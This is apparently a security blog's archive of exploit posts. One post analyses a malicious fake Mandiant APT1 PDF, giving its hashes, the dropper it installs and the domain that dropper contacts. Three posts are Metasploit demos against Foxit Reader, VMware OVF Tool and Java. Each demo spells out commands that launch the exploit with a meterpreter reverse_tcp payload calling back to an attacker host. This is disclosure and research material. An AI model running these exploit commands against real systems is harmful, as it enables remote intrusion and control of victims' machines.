Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

Exploitation Demo of Fake Mandiant APT1 Report PDF

Exploits, , , , , , , ,

As mentioned by Symantec & Seculert, a spear phishing campaign has involved a fake Mandiant APT1 PDF report, a report published by Mandiant earlier this week (APT1: Exposing One of China’s Cyber Espionage Units). This fake PDF was used in targeted attacks against Japanese entities and exploiting code for Adobe Acrobat and Reader Remote Code Execution Vulnerability (CVE-2013-0641).

Despite the analysis of Symantec, I can confirm you that the PDF is dropping malware onto the computer.

PDF file name is “Mandiant.pdf” with 2a42bf17393c3caaa663a6d1dade9c93 hash (23 / 46 on VirusTotal). Once opened an error message is displayed.

pdf-error-message

After ignoring this error message the vulnerability is exploited and drop “AdobeARM.exe” (41915b34fc50ffdd2a6a0969e3f55ff1) in “C:\Documents and Settings\<USER>\Local Settings\Temp” Windows folder. Chinese simplified ressource language is used for this executable.

AdobeARM-properties

AdobeARM.exe” is connecting to domain name “www.shounkaku.co.jp“, a legit website, and to folder “/space/fsjd-ge3234c4d61033.gif“. The file is actually no more existing.

Interesting strings in “AdobeARM.exe” are “Hello from MFC!” (Military Force of China ?).

AdobeARM-strings

Regarding the PDF, the embedded JavaScript seem to be the same as in the original version of 0day (sHOGG, oTHERWISE, and others functions and variables names). So it seem that some guys have successfully weaponize the original version of 0day.

pdf-shogg

Here under a demonstration video of the exploitation.

Foxit Reader Plugin URL Processing Vulnerability Metasploit Demo

Exploits, Metasploit, ,

Timeline :

Vulnerability discovered by rgod the 2013-01-07
Vendor public release of the vulnerability the 2013-01-14
Metasploit PoC provided the 2013-02-12

PoC provided by :

rgod
Sven Krewitt
juan vazquez

Reference(s) :

CVE-2012-3569
OSVDB-89030
BID-57174
Foxit Bulletin

Affected version(s) :

Foxit Reader 5.4.4 and earlier
Foxit PhantomPDF 5.4.2 and earlier

Tested on Windows 7 Integral SP1 with :

Firefox 18.0.2
Foxit Reader version 5.4.4.11281

Description :

This module exploits a vulnerability in the Foxit Reader Plugin, it exists in the npFoxitReaderPlugin.dll module. When loading PDF files from remote hosts, overly long query strings within URLs can cause a stack-based buffer overflow, which can be exploited to execute arbitrary code. This exploit has been tested on Windows 7 SP1 with Firefox 18.0 and Foxit Reader version 5.4.4.11281 (npFoxitReaderPlugin.dll version 2.2.1.530).

Commands :

use exploit/windows/browser/foxit_reader_plugin_url_bof
set SRVHOST 192.168.178.26
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo

CVE-2012-3569 VMWare OVF Tool Format String Vulnerability Metasploit Demo

Exploits, Metasploit, , ,

Timeline :

Vulnerability discovered and reported to vendor by Jeremy Brown of Microsoft
Coordinated public release of the vulnerability the 2012-11-08
Metasploit PoC provided the 2013-02-04

PoC provided by :

Jeremy Brown
juan vazquez

Reference(s) :

CVE-2012-3569
OSVDB-87117
BID-56468
VMSA-2012-0015

Affected version(s) :

VMware OVF Tool 2.1 and earlier for Windows
VMware Workstation 8.0.5 and earlier for Windows
VMware Player 4.0.4 and earlier for Windows

Tested on Windows XP Pro SP3 with :

VMware OVF Tool 2.1

Description :

This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for Windows. The vulnerability occurs when printing error messages while parsing a a malformed OVF file. The module has been tested successfully with VMWare OVF Tools 2.1 on Windows XP SP3.

Commands :

use exploit/windows/browser/ovftool_format_string
set SRVHOST 192.168.178.26
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo

CVE-2012-5088 Java Applet Method Handle RCE Metasploit Demo

Exploits, Metasploit, , , ,

Timeline :

Vulnerability patched by Oracle in 2012 October CPU
Metasploit PoC provided the 2013-01-22

PoC provided by :

Unknown
juan vazquez

Reference(s) :

CVE-2012-5088
OSVDB-86352
BID-56057
Oracle October 2012 CPU
New Java Modules in Metasploit… No 0 days this time

Affected version(s) :

Oracle Java version 7 Update 7 and earlier.

Tested on Windows 8 Pro with :

Internet Explorer 10
Oracle Java 7 Update 7

Description :

This module abuses the Method Handle class from a Java Applet to run arbitrary Java code outside of the sandbox. The vulnerability affects Java version 7u7 and earlier.

Commands :

use exploit/multi/browser/java_jre17_method_handle
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo